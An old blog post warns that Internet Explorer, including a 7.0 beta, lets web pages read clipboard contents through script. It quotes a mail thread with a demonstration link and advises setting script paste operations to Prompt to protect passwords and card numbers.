SD3 + C violation

It seems to me a clear violation of (SD3 + C) Secure by Design, Secure by Default, Secure in Deployment and Communications principle. The scary thing was, I could even reproduce it in IE 7.0 beta; not a firefox vulnerability of course (not that I'm a firefox fan but people!).


Next time you have your cc number, SSN or BoA password in your clipboard, please don't be browsing “those“ sites.


Be careful with Ctrl-C

Via Stefan Goßner:


[From a mail thread]


Data stored in clipboard can be accessed by a malicious website through a combination of Javascripts and server side code (like ASP, ASP.NET, PHP, CGI, ...).
Just try this:
Copy any text by ctrl+c
Click the Link: http://www.friendlycanadian.com/applications/clipboard.htm
You will see the text you copied on the Screen which was accessed by this web page.
A malicious websites can easily steal sensitive data (like passwords, creditcard numbers, PIN etc.) stored in your clipboard while surfing the web. To prevent this you should change the security setting Allow paste operations via script for at least the Internet Zone in Internet Explorer to Prompt. Per default this setting is set to Enabled.


More on Thinking About Security: Secure by Design, Secure by Default, Secure in Deployment and Communications

Share